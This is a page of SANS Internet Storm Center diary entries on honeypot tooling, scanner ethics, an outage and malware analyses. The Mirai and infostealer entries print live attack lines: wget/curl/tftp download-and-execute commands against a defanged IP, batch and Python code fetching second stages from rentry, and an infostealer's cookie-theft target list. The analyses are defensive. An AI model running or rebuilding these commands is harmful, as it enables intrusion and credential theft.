Tag Archives: SANS

Utilizing the VirusTotal API to Query Files Uploaded to DShield Honeypot [Guest Diary], (Sun, Feb 25th)

This post was originally published on this site

[This is a Guest Diary by Keegan Hamlin, an ISC intern as part of the SANS.edu BACS program]

Part of the SANS undergraduate program is a 20-week internship with the SANS Internet Storm Center. During that time, interns are tasked with setting up a DShield sensor to act as a honeypot, capturing data and generating logs for SSH/Telnet, Firewall activity, Web requests, and most interesting to me, file uploads. With those logs, we are expected to create attack observations, explaining what vulnerability is being exploited, what the attacker is attempting to accomplish, and how to defend against this attack. I wanted to give myself a project to help aid with creating these attack observations, and in my case, a way to quickly get information on the uploaded files. At the beginning of the internship, I had given myself a personal goal, which was to do something to build my Python skills. I thought this might be the opportunity to do that.

VirusTotal is a go-to source to upload or search for hashes of suspicious files and it is what I typically use when investigating files uploaded to the honeypot. They offer an API to automate this process, and it integrates well with Python.

Simple Command Line Query

I began by following the steps listed in the VirusTotal quick start page for their Python integration tool vt-py. [1]

You can install this package in several way, but I simply used pip:
$ pip install vt-py

After playing around with the tool in a Python interactive session, I wrote a simple script that takes a file hash as a command line argument:

import vt
import sys

try:
    file_hash = sys.argv[1]
except IndexError:
    print("ERROR: You must supply a file hash.")
    sys.exit(1)

# //// VIRUSTOTAL API KEY ////
API = # CHANGE THIS TO YOUR VIRUSTOTAL API KEY

client = vt.Client(API)

file = client.get_object(f"/files/{file_hash}")

analysis = file.last_analysis_stats

for x,y in analysis.items():
    print(x.title(),":",y)

client.close()

The output looks like this:

$ python vt_simple.py 57e9955208af9bc1035bd7cd2f7da1db19ea73857bea664375855f693a6280d8
Malicious : 37
Suspicious : 0
Undetected : 22
Harmless : 0
Timeout : 0
Confirmed-Timeout : 0
Failure : 1
Type-Unsupported : 15

This doesn’t give a whole lot of information, however while investigating an attack, it is a quick way to check to see if a file has been analyzed and is being tracked as malicious.

I wanted more though. I wanted a way to automate submissions of all the files within the Cowrie /downloads directory and output in a format that would make it easy to quickly scan to determine which files might need further analysis.

Full Scan of Cowrie Downloads Directory

There were a couple of things I needed to keep in mind before writing this script. For one, the VirusTotal API has limitations on the frequency and number of queries for a free-tier account. Those are 4 lookups/min, 500/day, 15.5 K/month. There is no way that I would hit the daily or monthly limits, but I had to make sure the script didn’t perform more than 4 queries a minute. Easy enough to manage by adding a pause between each lookup. However, depending on the number of files in the download’s directory, this does mean that the script will take some time to complete the first time it is run.

Another aspect that I wanted to keep in mind was that I did not want the script to query files that it had already retrieved data on. There might be some spaghetti coding going on here, but to prevent that from happening, I had the script make a separate file_hashes.txt file that holds all the hashes that have been used to query VirusTotal already.
In the Cowrie download directory, all the filenames should already be the SHA256 hash of the file. In my case, there were a few that were not. I had already added a try/except block in my function that queries VirusTotal so that if a query fails, it won’t send an error to the console and end the program. To cover my bases and ensure that an actual file hash gets submitted, I added an if/else block to check if the filename is equal to 64 characters. This might not be the best way, but it makes it so that the program isn’t needlessly hashing each file, especially considering most of them are already renamed to the appropriate file hash.

This led me down a path to figure out how to hash a file in Python. In the Linux terminal, it’s easy as running the sha256sum command and you get the hash. I already knew of the Python hashlib module but was unsure of how to implement it into hashing a file. After some Google searching, I came across a page that was exactly what I was looking for [2]. Here is the code:

# Python program to find SHA256 hash string of a file
import hashlib
 
filename = input("Enter the input file name: ")
sha256_hash = hashlib.sha256()
with open(filename,"rb") as f:
    # Read and update hash string value in blocks of 4K
    for byte_block in iter(lambda: f.read(4096),b""):
        sha256_hash.update(byte_block)
    print(sha256_hash.hexdigest())

Just for the sake of learning more, I asked ChatGPT how I would go about hashing a file in Python and it gave me an almost verbatim answer. I’m thinking either ChatGPT sourced its response from the page I found, or vice-versa. Either way, I got what I was looking for and learned a little bit about the process of hashing a file.

The output of this program is a simple database in the form of a CSV. Viewing it in the terminal is horrendous. Obviously transferring it out to a host machine is needed, either by scp or even nc, but I found it easy enough to copy/paste into a blank notepad, saving as a ‘.csv’ and opening in Excel (or CSV viewer of your choice). The results look like this:

For times that I would like to stay in the terminal and to take a quick glance at the database, I added a function in the program to output a second plain text document that formats it in a way that is legible. There’s no sorting capability, and it may not be the best looking, but it is nice to have a quick way to pull up and review while investigating attacks without having to leave the terminal. There were a couple of different ways to get a csv to pretty print in the terminal, like Pretty Tables, but I liked the way this looked. It isn’t my code, however. I found it in a Stack Overflow post [3]. It looks like this:

Both scripts can be found on my Github:
https://github.com/ham-sauce/vt_cowrie

By the time I implemented this script in my DShield sensor, it had already been running for several months, so I had quite a few files that needed processed, roughly 160. At 4 queries a minute, it took about 40 minutes for the initial run. Once the initial database is made, running the script again will not take nearly as long. The way I have been using it is to periodically run it every few days. If it takes longer than an instant to complete, then I know there is something new added to the downloads directory (there is also an alert printed to the console stating which hash is being queried). 

I really only scratched the surface of what can be done with the VirusTotal API. There is definitely room to refine this script, make it more robust and tweak it in a way to gather more data.

Next Steps: Simple Malware Analysis

Using the above output from the script, I want to try to find something interesting to investigate. I sort the list of files by ‘UNDETECTED’, as I feel that if a file is being reported as malicious, there are already plenty of analysis reports that I can look up.

In my case, many of these undetected files were not worth much more investigating, as many of them were simple ASCII text files containing one or two bash commands. But it’s a good starting point.

Static Analysis

I only do a couple of things in regard to static analysis, and I will accomplish this in the DShield terminal. 
First, I will run the file command on the file of interest, getting something like this:
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, missing section headers

And then I will run the strings command. Which rarely gets back anything useful, but sometimes there will be a string or two worthwhile. Like the following:
$Info: This file is packed with the UPX executable packer http://upx.sf.net $

At this point, I will move the file to an analysis virtual machine, either FlareVM or REMNUX. To do this somewhat safely, I like to zip it and password protect it like so:
zip –password infected mal.zip </path/to/file>

And then scp it to my host of choice.

Dynamic/Behavioral Analysis

When I first started this post, I really wanted to get my hands on Mockingbird from Assured Information Security. [4] It is an automated malware analysis environment based off the Cuckoo Sandbox. I had used it at my previous job, and it is extremely easy to use. It comes pre-configured; all you must do is load it up in either ESXi or VMware Workstation. According to the data sheet, they have an evaluation copy available, but unfortunately the company never got back to me.

The official Cuckoo Sandbox is no longer supported. However, there are several forks available such as cuckoo3 [5] and CAPEv2 [6]. Setting either of those up is a bit of an undertaking, not for the faint of heart. I ran into issues that I couldn’t resolve in a timely manner, and it all seemed a bit out of scope for what I was trying to accomplish, so I abandoned this idea.

There are numerous web-based automated malware analyzers out there. Unfortunately, most of them only support Windows executable, at least in the free tier. And with the DShield honeypot being Linux based, pretty much any malware uploaded to it is going to be an ELF executable or bash script. Surprisingly, as I was writing this, ANY.RUN [7] released a Linux environment to analyze malware.

It is very simple to use. After creating an account and signing in, click the new task button:

Drag and drop your file into the window and select Ubuntu:

The app will then run the executable in an Ubuntu virtual environment and generate a report for review. There are numerous indicators that can be further investigated, such as process information which includes command line arguments, file activity, and network activity like connections made or DNS requests. At that point, you could correlate some of this data with other attacks made against the honeypot and possibly find even more rabbit holes to go down.

Final Thoughts

This is obviously not a full deep dive into malware analysis. My goal was to create a simple process for myself to assist with researching the events taking place on my DShield honeypot. There is plenty of room for this grow, and there is so much information out there on doing proper malware analysis.

[1] https://virustotal.github.io/vt-py/quickstart.html
[2] https://www.quickprogrammingtips.com/python/how-to-calculate-sha256-hash-of-a-file-in-python.html
[3] https://stackoverflow.com/questions/52520711/how-to-output-csv-data-to-terminal-with-python
[4] https://www.ainfosec.com/rd/mockingbird/
[5] https://github.com/cert-ee/cuckoo3
[6] https://github.com/kevoreilly/CAPEv2
[7] https://app.any.run/
[8] https://www.sans.edu/cyber-security-programs/bachelors-degree/

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Update: MGLNDD_* Scans, (Sat, Feb 24th)

This post was originally published on this site

Almost 2 years ago, a reader asked us about TCP connections they observed. The data of these TCP connections starts with "MGLNDD_": "MGLNDD_* Scans".

Reader Michal Soltysik reached out to us with an answer: MGLN is Magellan, RIPE Atlas Tools. RIPE Atlas employs a global network of probes that measure Internet connectivity and reachability.

Thanks to Michal for explaining this in a video.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Simple Anti-Sandbox Technique: Where's The Mouse?, (Fri, Feb 23rd)

This post was originally published on this site

Malware samples have plenty of techniques to detect if they are running in a "safe" environment. By safe, I mean a normal computer with a user between the keyboard and the chair, programs running, etc. These techniques are based on checking the presence of specific processes, registry keys, or files. The hardware can also be a good indicator (are some devices present or not?)

Some techniques rely on basic checks that can be easily implemented in a simple Windows script (.bat) file. I found an interesting one that performs a basic check before downloading the next payload. The file has the following SHA256 hash: 460f956ecb4b54518be32f2e48930187356301013448e36414c2fb0a1815a2cb[1]

set "mouseConnected=false"

for /f "tokens=2 delims==" %%I in ('wmic path Win32_PointingDevice get PNPDeviceID /value ^| find "PNPDeviceID"') do (
    set "mouseConnected=true"
)

if not !mouseConnected! == true (
    exit /b 1
)

The script uses the WMI ("Windows Management Instrumentation") client to query the hardware and filter interesting devices. Here is an output generated on a regular computer:

C:UsersREMDesktop>wmic path Win32_PointingDevice get PNPDeviceID /value

PNPDeviceID=ACPIPNP0F134&amp;1BD7F811&amp;0

PNPDeviceID=USBVID_0E0F&amp;PID_0003&amp;MI_017&amp;12E62A01&amp;0&amp;0001

PNPDeviceID=USBVID_0E0F&amp;PID_0003&amp;MI_007&amp;12E62A01&amp;0&amp;0000

Indeed some basic sandboxes do not have a mouse connected to them. Easy trick! Note that, in a lot of organizations, access to the "wmic" tool is prohibited for normal users because it can be used to perform a lot of sensitive actions.

If no mouse is detected, the script will fetch its copy of a minimal Python environment and install it:

set "eee=https://www.python.org/ftp/python/3.10.0/python-3.10.0rc2-amd64.exe"
set "eeee=python-installer.exe"
curl -L -o !eeee! !eee! --insecure --silent
start /wait !eeee! /quiet /passive InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0 > NUL 2>&1
del !eeee!

Finally, it will download and execute the second stage:

set "ENCODED_URL=hxxps://rentry[.]co/zph33gvz/raw
set "OUTPUT_FILE=webpage.py"
curl -o %OUTPUT_FILE% -s %ENCODED_URL% --insecure
if %ERRORLEVEL% neq 0 (
    echo Error: Failed to download the webpage.
    exit /b 1
)
python -m %OUTPUT_FILE%
del %OUTPUT_FILE%

The second stage is another InfoStealer. Nothing special except the way the DIscord channel used as C2 is obfuscated:

webhook = b'xc8~~xc9(T>>x10x1e(x82=xa1x10x95x82=$>xbcxc9x1e>lM1xc8=={(>xb08-Z-xb3-x8b8x8bx1bxb0xb3xb0xb08x87Zx8b>xf91xe0f&x82gxe0xa7gx98xf0Yxd60xcdXxb4xb4xfexa6xc9xc9l~Y(gxf8x1c&x82xd6Nfx87exe0xf7)xf70e_,8xfexa6Zx1cxe28Mxaf_xc6,1Exf7N_xf2,_x1bne',b'x.x8dV+xb1cx94x9cwxb5x8ct]x12rx91[5yx8ax15Lxe5Bqxd0xa5x0cxd9xe8x9fxddx93Jxd4x88xb8x84xa3Kx02x0fxa8Ex95>-xb08x87x8bx1bxb3xf2x18ZTGx16xb2ixcfx11xb4xf7x07x1cuOYxcdxe0_,m&xf0xaaXxfeWxafx90xf9xc6xaexf8x08nx7fxabx014ex9axbc1x82x10M)fxc8x1exd6{g$xe2=xc9x98xa1(~Nxc5lxa6xa70xba/x053xb6bxfd"xdexa4hx9bIdxc1xc4xb9x96xf3x83x06xbd2Hxc7xc0xd5zxa0x99aoxefx13rx1dP7x14vxa2xeekxebxe1xbf9}:Rxe7'xbb<DQx9e^xfcxad%x8ex1fx97xc2Ux19x86x17x81xffxeaxfax9dFxa9p!xcc#xc3Cx85xdc|xf5j;xbeAxecxe4x80xd2xf4Sxb7xdbxe9x89xcbxd76x0bxe3`@x92x03xf1sxfbnxf6xd1xdaxd3x0exd8tx00x8fxedxe6xac xdfx04xca?*x1axce'

Is it decrypted using this simple function:

def DeobfuscateWeb(encrypted_text, key):
    decrypted = [0] * 256
    for i, char in enumerate(key):
        decrypted[char] = i

    decrypted_text = []
    for char in encrypted_text:
        decrypted_char = decrypted[char]
        decrypted_text.append(decrypted_char)

    return bytes(decrypted_text)

and returns "hxxps://discord[.]com/api/webhooks/1209060424516112394/UbIgMclIylqNGjzHPAAQxppwtGslXDMcjug3_IBfBz_JK2Qx9Dn2eSJVKb-BuJ7KJ5Z_"

[1] https://www.virustotal.com/gui/file/460f956ecb4b54518be32f2e48930187356301013448e36414c2fb0a1815a2cb/detection

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Large AT&#x26;T Wireless Network Outage #att #outage, (Thu, Feb 22nd)

This post was originally published on this site

Beginning this morning, AT&T's cellular network suffered a major outage across the US. At this point, AT&T has not made any statement as to the nature of the outage. It is far too early to speculate. In the past, similar outages were often caused by misconfigurations or technology failures.

What makes the outage specifically significant is that phones cannot connect to cell towers in some areas. This means you cannot make any calls, send or receive SMS messages, or reach emergency services. Some iPhones display the "SOS" indicator, which is displayed if the phone is able to make emergency-only calls via another provider's network. For some newer iPhones, satellite services may be used.

As a workaround, WiFi calling is still reported to work. If you do have an internet connection via a different provider and are able to enable WiFi calling, you will be able to make and receive calls.

Note that this will affect many devices like location trackers, alarm systems, or other IoT devices that happen to use AT&T's network. This could have security implications if you rely on these devices to monitor remote sites.

Some users are reporting that service has already been restored in their area, but without an official statement from AT&T, it is hard to predict how long service restoration will take. For your own planning purposes, I would assume it will be several hours for the service to be fully restored.

Some other workarounds to consider:

  • Many modern phones will allow for a second eSIM to be installed. T-Mobile and WiFi sometimes offer free trials of their network, and it may get you going for the day.
  • As mentioned above, WiFi calling is reported to work.
  • Get a data-only eSIM with a low-cost provider with enough data to "survive" the day.

For resiliency, it is always best to have a secondary internet connection available. In many cases, the cellular connection is your secondary connection. The outage also effects AT&T resellers (MVNOs) like Cricket, Consumer Celular, and Straight Talk.


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

[Guest Diary] Friend, foe or something in between? The grey area of 'security research', (Thu, Feb 22nd)

This post was originally published on this site

[This is a Guest Diary by Rachel Downs, an ISC intern as part of the SANS.edu Bachelor's Degree in Applied Cybersecurity (BACS) program [1].

Scanning on port 502

I’ve been running my DShield honeypot for around 3 months, and recently opened TCP port 502. I was looking for activity on this port as it could reveal attacks targeted towards industrial control systems which use port 502 for Modbus TCP, a client/server communications protocol. As with many of my other observations, what started out as an idea to research one thing soon turned into something else, and ended up as a deep dive into security research groups and the discovery of a lack of transparency about their actions and intent.

I analysed 31 days of firewall logs between 2023-12-05 and 2024-01-04. Over this period, there were 197 instances of scanning activity on port 502 from 179 unique IP addresses.

 

Almost 90% of scanning came from security research groups

Through AbuseIPDB [2] and GreyNoise [3], I assigned location, ISP and hostname data (where available) to each IP address. GreyNoise assigns actors to IP addresses and categorises these as benign, unknown or malicious. Actors are classified as benign when they are a legitimate company, search engine, security research organisation, university or individual, and GreyNoise has determined the actor is not malicious in nature. Actors are classified as malicious if harmful behaviours have been directly observed by GreyNoise, and if an actor is not classified as benign or malicious it is marked as unknown [4]. 

I used this classification, additional data from AbuseIPDB, and the websites of self-declared security research groups to categorise the scanning activity observed in my honeypot firewall logs.

 

89% of the total scanning activity was attributed to security research groups, 3% was attributed to known malicious actors and 8% was unknown.

Who are these researchers, and why are they scanning?

Almost half of the activity classified as security research came from two groups: Stretchoid and Censys. Other frequently observed groups included Palo Alto Networks, Shadowserver Foundation, InterneTTL, Cyble and the Academy for Internet Research. The remaining groups were only observed scanning port 502 once or twice each, including Shodan.

 

The motivations of these different research groups varies, and for some their purpose is unclear or unstated. Some are academic research projects, some are commercial organisations collecting data to feed into their products and services, and others are less clear.

Stretchoid was the most active actor identified, accounting for 25% of security research activity. There is very little information available about them, aside from an opt-out page. The page states “Stretchoid is a platform that helps identify an organisation’s online services. Sometimes this activity is incorrectly identified by security systems, such as firewalls, as malicious. Our activity is completely harmless” [5]. However, there is a lack of transparency around the organisation responsible for Stretchoid and as such, online discussions about them urge caution around submitting data through the opt-out form [6].

Censys conducts internet-wide scanning to collect data for its security products and datasets [7].

Palo Alto Networks were able to be identified using the ISP name, however they did not enable reverse DNS lookup for hostnames to identify the scanner being used. These IP addresses are marked as benign in GreyNoise and attributed to Palo Alto’s Cortex Xpanse product.

Shadowserver Foundation describe themselves as “a nonprofit security organisation working altruistically behind the scenes to make the internet more secure for everyone” [8].

InterneTTL’s website was not active at the time of this report, however GreyNoise points to it being a security research organisation that regularly mass-scans the internet [9].

Cyble describes its ODIN product as “one of the most powerful search engines for internet scanned assets”. It carries out host searches, asset discovery, port scanning, service identification, vulnerability detection and certificate analysis [10].

The Academy for Internet Research’s website states they are “a group of security researchers that wish to make the internet free, safe and accessible to all” [11].

bufferover.run is identified by GreyNoise as a commercial organisation that performs domain name lookups for TLS certificates in IPv4 space. GreyNoise has marked this actor as benign but it is unclear why they are carrying out port scanning activity [12].

Crowdstrike was seen twice via scans from Crowdstrike Falcon Surface (Reposify), which they describe as “the world’s leading AI-native platform for unified attack surface management” [13].

SecurityTrails is a Recorded Future company offering APIs and data services for security teams [14].

Shodan scanners were seen twice. These are used to capture data for Shodan’s search engine for internet-connected devices [15].

Alpha Strike Labs is a German security research company producing open source intelligence about attack surfaces using global internet scans. They claim to maintain more than 2000 IPv4 addresses for scanning [16].

BinaryEdge “scan the entire public internet, create real-time threat intelligence streams and reports the show the exposure of what is connected to the internet” [17].

CriminalIP is an internet-exposed device search engine run by AI Spera [18].

Internet Census Group is led by BitSight Technologies Inc and states data is collected to “analyse trends and benchmark security performance across a broad range of industries” [19].

Internet Measurement is operated by driftnet.io and is used to “discover and measure services that network owners and operators have publicly exposed”. They offer free access to an external view of your network from the data they have gathered [20].

Onyphe describes itself as a “cyber defence search engine” [21]. They provide an FAQ about their scanning on their website.

The Technical University of Denmark’s research project aims to identify “digital ghost ships” [22], devices which appear to be abandoned and un-maintained.

A lack of transparency

The UK's National Cyber Security Centre (NCSC), when launching its own internet scanning capability, provided some transparency and scanning principles [23] that they committed to following, and encouraged other security researchers to do the same:

  • Publicly explain the purpose and scope of the scanning system
  • Mark activity so that it can be traced back to the scanning system being used
  • Audit scanning activity so abuse reports can be easily and confidently assessed
  • Minimise scanning activity to reduce impact on target resources
  • Ensure opt-out requests are simple to send and processed quickly

Adherence to these principles varied between the research groups observed, but was generally quite poor among the more prolific scanners in this observation. It was not possible to observe whether research groups were auditing scanning activity, so this is not rated in the table below.

Fig 4: An analysis of security research groups’ adherence to NCSC’s ethical scanning principles
 

Fig 5: A guide to the ratings used in Fig 4

 

This lack of transparency makes it difficult to determine whether this activity is truly benign.

Good practice is demonstrated by Onyphe, who provide information about their scanning and their “10 commandments for ethical internet scanning” on their website. Along with the Technical University of Denmark, they also provide a web server on each of their probes which explains the purpose, intent and the ability to opt out.  

Why does this matter?

The volume of scanning activity related to security research is significant, and has an impact on honeypot data. This has been discussed in a previous ISC blog post by Johannes Ullrich, “The Impact of Researchers on Our Data” [24]. Quick and accurate identification and filtering of research activity enables honeypot operators to more rapidly identify malicious activity, or activity that requires further investigation.

Equally, the presence of honeypot data in security research scans impacts the conclusions that will be drawn by researchers about the presence of open ports and vulnerable systems, and the estimated scale of these issues.

Although researchers themselves may not be using the data collected for malicious purposes, they may lose control of how the data is used once it is shared or sold elsewhere. For example, Shodan scanning activity is classed as security research, however the resulting data can be used by attackers to find vulnerable targets. 

Some of the organisations involved in this scanning are profiting from the data collected from your systems, utilising your resources to do this. Ethical researchers should allow you to opt-out of this data collection.

Security research is a broad term, and the intent behind scanning activity is not always clear. This makes security research something of a grey area, and means transparency is key in order for informed decisions to be made.

What should I do?

As a honeypot operator, or someone responsible for monitoring internet-facing systems, you may decide to reduce scanning noise by blocking security research traffic. This is made difficult when researchers don’t publish the IP addresses they use, or don’t provide the ability to opt-out. To help with this, the ISC provides a feed of IP addresses used by researchers through their API [25].

All activity relating to Stretchoid, the most active research group in this observation, originated from DigitalOcean. Some users recommend blocking DigitalOcean’s IP ranges (unless this is required for your organisation) as an alternative to opting out. 

A number of GitHub projects also exist to track the IP ranges of Stretchoid and other security research groups, such as szepevictor’s stretchoid.ipset [26].

Research groups could do more to build trust and help security teams separate benign activity from malicious. If you carry out internet scanning activities, it’s a good idea to follow the NCSC guidance discussed in this blog post to maintain transparency and allow others to make informed decisions about allowing or blocking your scans. 

Enabling reverse DNS and using hostnames that identify your organisation or scanner is a good way to make your scanning activity identifiable, and an informative web page with a clear explanation of the purpose of data collection, including the ability to opt out, helps demonstrate your positive intentions. 

[1] https://www.sans.edu/cyber-security-programs/bachelors-degree/
[2] https://www.abuseipdb.com
[3] https://www.greynoise.io
[4] https://docs.greynoise.io/docs/understanding-greynoise-classifications
[5] https://stretchoid.com/
[6] https://www.reddit.com/r/cybersecurity/comments/10w2eab/stretchoid_phishing_and_recon_campaign/
[7] https://about.censys.io/
[8] https://www.shadowserver.org/
[9] https://viz.greynoise.io/tag/internettl?days=1
[10] https://getodin.com/
[11] https://academyforinternetresearch.org/
[12] https://viz.greynoise.io/tag/bufferover-run?days=1
[13] https://www.crowdstrike.com/products/exposure-management/falcon-surface/
[14] https://securitytrails.com/
[15] https://www.shodan.io/
[16] https://www.alphastrike.io/en/how-it-works/
[17] https://www.binaryedge.io/
[18] https://www.criminalip.io/
[19] https://www.internet-census.org/home.html
[20] https://internet-measurement.com/
[21] https://www.onyphe.io/about
[22] https://www.dtu.dk/english/newsarchive/2023/01/setting-out-to-sink-the-internets-digital-ghost-ships
[23] https://www.ncsc.gov.uk/blog-post/scanning-the-internet-for-fun-and-profit
[24] https://isc.sans.edu/diary/The+Impact+of+Researchers+on+Our+Data/26182
[25] https://isc.sans.edu/api/threatcategory/research (append “?json” or “?tab” to view in JSON or tab delimited format)
[26] https://github.com/szepeviktor/debian-server-tools/blob/master/security/myattackers-ipsets/ipset/stretchoid.ipset


Jesse La Grew
Handler

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Phishing pages hosted on archive.org, (Wed, Feb 21st)

This post was originally published on this site

The Internet Archive is a well-known and much-admired institution, devoted to creating a “digital library of Internet sites and other cultural artifacts in digital form”[1]. On its “WayBackMachine” website, which is hosted on https://archive.org/, one can view archived historical web pages from as far back as 1996. The Internet Archive basically functions as a memory for the web, and currently holds over 800 billion web pages as well as millions of books, audio and video recordings and other content… Unfortunately, since it allows for uploading of files by users, it is also used by threat actors to host malicious content from time to time[2,3].

Python InfoStealer With Dynamic Sandbox Detection, (Tue, Feb 20th)

This post was originally published on this site

Infostealers written in Python are not new. They also onboard a lot of sandbox detection mechanisms to prevent being executed (and probably detected) by automatic analysis. Last week, I found one that uses the same approach but in a different way. Usually, the scripts have a list of "bad stuff" to check like MAC addresses, usernames, processes, etc. These are common ways to detect simple sandboxes that are not well-hardened. This time, the "IOD" (Indicators Of Detection) list is stored online on a Pastebin-like site, allowing the indicators to be updated for all scripts already deployed. It's also a way to disclose less interesting information in the script.

The file, called main.py, has a VT score of 22/61 (SHA256: e0f6dcf43e19d3ff5d2c19abced7ddc2e703e4083fbdebce5a7d44a4395d7d06)[1]

The script will fetch indicators from many files hosted on rentry.co[2]:

remnux@remnux:/MalwareZoo/20240217$ grep hxxps://rentry[.]co main.py 
     processl = requests.get("hxxps://rentry[.]co/x6g3is75/raw").text
     mac_list = requests.get("hxxps://rentry[.]co/ty8exwnb/raw").text
     vm_name = requests.get("hxxps://rentry[.]co/3wr3rpme/raw").text
     vmusername = requests.get("hxxps://rentry[.]co/bnbaac2d/raw").text
     hwid_vm = requests.get("hxxps://rentry[.]co/fnimmyya/raw").text
     gpulist = requests.get("hxxps://rentry[.]co/povewdm6/raw").text
     ip_list = requests.get("hxxps://rentry[.]co/hikbicky/raw").text
     guid_pc = requests.get("hxxps://rentry[.]co/882rg6dc/raw").text
     bios_guid = requests.get("hxxps://rentry[.]co/hxtfvkvq/raw").text
     baseboard_guid = requests.get("hxxps://rentry[.]co/rkf2g4oo/raw").text
     serial_disk = requests.get("hxxps://rentry[.]co/rct2f8fc/raw").text

All files were published on January 27 2024 around 23:19 UTC. The website gives also the number of views. Currently, there are only two (certainly my visits) so the script hasn't been released in the wild yet. I'll keep an eye on these counters in the coming days.

Here is an example of usage:

def checkgpu(self):
    c = wmi.WMI()
    for gpu in c.Win32_DisplayConfiguration():
        GPUm = gpu.Description.strip()
    gpulist = requests.get("https://rentry.co/povewdm6/raw").text
    if GPUm in gpulist:
        sys.exit()

The remaining part of the stealer is very classic. I just extracted the list of targeted websites (cookies are collected and exfiltrated):

keyword = [
    'mail', 
    '[coinbase](https://coinbase.com)', 
    '[sellix](https://sellix.io)',
    '[gmail](https://gmail.com)',
    '[steam](https://steam.com)',
    '[discord](https://discord.com)',
    '[riotgames](https://riotgames.com)',
    '[youtube](https://youtube.com)',
    '[instagram](https://instagram.com)',
    '[tiktok](https://tiktok.com)',
    '[twitter](https://twitter.com)',
    '[facebook](https://facebook.com)',
    'card',
    '[epicgames](https://epicgames.com)',
    '[spotify](https://spotify.com)',
    '[yahoo](https://yahoo.com)',
    '[roblox](https://roblox.com)',
    '[twitch](https://twitch.com)',
    '[minecraft](https://minecraft.net)',
    'bank',
    '[paypal](https://paypal.com)',
    '[origin](https://origin.com)',
    '[amazon](https://amazon.com)',
    '[ebay](https://ebay.com)',
    '[aliexpress](https://aliexpress.com)',
    '[playstation](https://playstation.com)',
    '[hbo](https://hbo.com)',
    '[xbox](https://xbox.com)',
    'buy',
    'sell',
    '[binance](https://binance.com)',
    '[hotmail](https://hotmail.com)',
    '[outlook](https://outlook.com)',
    '[crunchyroll](https://crunchyroll.com)',
    '[telegram](https://telegram.com)',
    '[pornhub](https://pornhub.com)',
    '[disney](https://disney.com)',
    '[expressvpn](https://expressvpn.com)',
    'crypto',
    '[uber](https://uber.com)', 
    '[netflix](https://netflix.com)'
]

You can see that classic sites are targeted but generic keywords are also present like "crypto", "bank" or "card". Cookies belonging to URLs containing these keywords will also be exfiltrated.

[1] https://www.virustotal.com/gui/file/e0f6dcf43e19d3ff5d2c19abced7ddc2e703e4083fbdebce5a7d44a4395d7d06/details
[2] https://rentry.co

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Mirai-Mirai On The Wall… [Guest Diary], (Sun, Feb 18th)

This post was originally published on this site

[This is a Guest Diary by Rafael Larios, an ISC intern as part of the SANS.edu BACS program]

About This Blog Post

This article is about one of the ways attackers on the open Internet are attempting to use the Mirai Botnet [1][2] malware to exploit vulnerabilities on exposed IoT devices. My name is Rafael Larios, and I am a student at the SANS Technology Institute’s Bachelor’s in Applied Cyber Security program. One of the requirements for completion of this degree, is to participate in an internship with the Internet Storm Center as an apprentice handler. Throughout this article, I will provide some insight on an attack method I found to be interesting.

It’s All About Mirai…

There are many sources discussing Mirai and a vulnerability found in IoT devices that allows attackers to join a host to their botnet. This malware still has relevance and continues to be used in attempts to compromise undefended systems. In 2023 at least three CVEs involving Mirai have been reported: CVE-2023-1389 [3], CVE-2023-26801 [4], and CVE-2023-23295 [5]. The malware continues to evolve since its initial creation in 2016. More on the humble origins of this malware can be found in the citations at the end of this article.

What Happened?

This article does not involve malware reverse engineering, but an analysis of how an attacker executed their plans on our honeypot. I observed such an attack using Cowrie that took place on 20 August 2023 that stood out from the list of attacks on the TTY logs. Wikipedia describes Cowrie as “…a medium interaction SSH and Telnet honeypot designed to log brute force attacks and shell interaction performed by an attacker. Cowrie also functions as an SSH and telnet proxy to observe attacker behaviour to another system”. More information can be found on Github:

https://github.com/cowrie/cowrie

The size of the recorded attack was significantly larger at 177kb compared to average logged attacks that were half the size or less. After analysis, the observed attack involved a trojan downloader for a botnet.

Playing back the TTY log entry with the Python playlog utility from within Cowrie, I found that the attacker used 51 SSH commands before the connection was terminated. This explains the size of the log.

The attack seemed automated, and involved various system checks, before downloading 312bytes to the /tmp folder with the following command:

wget http://46.29.166[.]61/sh || curl -O http://46.29.166[.]61/sh || tftp 46.29.166[.]61 -c get sh || tftp -g -r sh 46.29.166[.]61; chmod 777 sh;./sh ssh; rm -rf sh

The chain of commands attempts to use built-in Linux tools to download a file called ‘sh’ from an IP address from Moscow, Russian Federation. It wants to either use wget, curl, or tftp to download ‘sh’. It later tries to execute ‘sh’ and the SSH command, only to later remove the downloaded binary ‘sh’.

An error occurred and bash output stated that the command was not found. The attacker then tried to delete any existing files of what it was about to add to the /tmp folder. The following command was used to accomplish this:

rm -rf x86; rm -rf sshdmiori

Afterwards the attacker obtained information about the honeypot’s CPU with the following command:

cat /proc/cpuinfo || while read i; do echo $i; done < /proc/cpuinfo

We now come to the next stage of the attack.

Hexadecimal to Binary Executable
Within the 51 executed commands, 41 of them were hexadecimal numbers being echoed to a file named ‘x86’. Below is one of the 41 commands:

echo -ne "x00x08x00x00x00x00x00x00x00x00x00x10x00x00x00x00x00x51xe5x74x64x06x00x00x00x00x00x00x00x00x00x00" >> x86

After concatenating all of the hexadecimal numbers into a binary file, I was able to acquire the SHA256 hash using CyberChef, a tool created and maintained by GHCQ, and can be accessed on Github as well: https://github.com/gchq/CyberChef
SHA256: b1c22ba1b958ba596afb9b1a5cd49abf4eba8d24e85b86b72eed32acc1745852
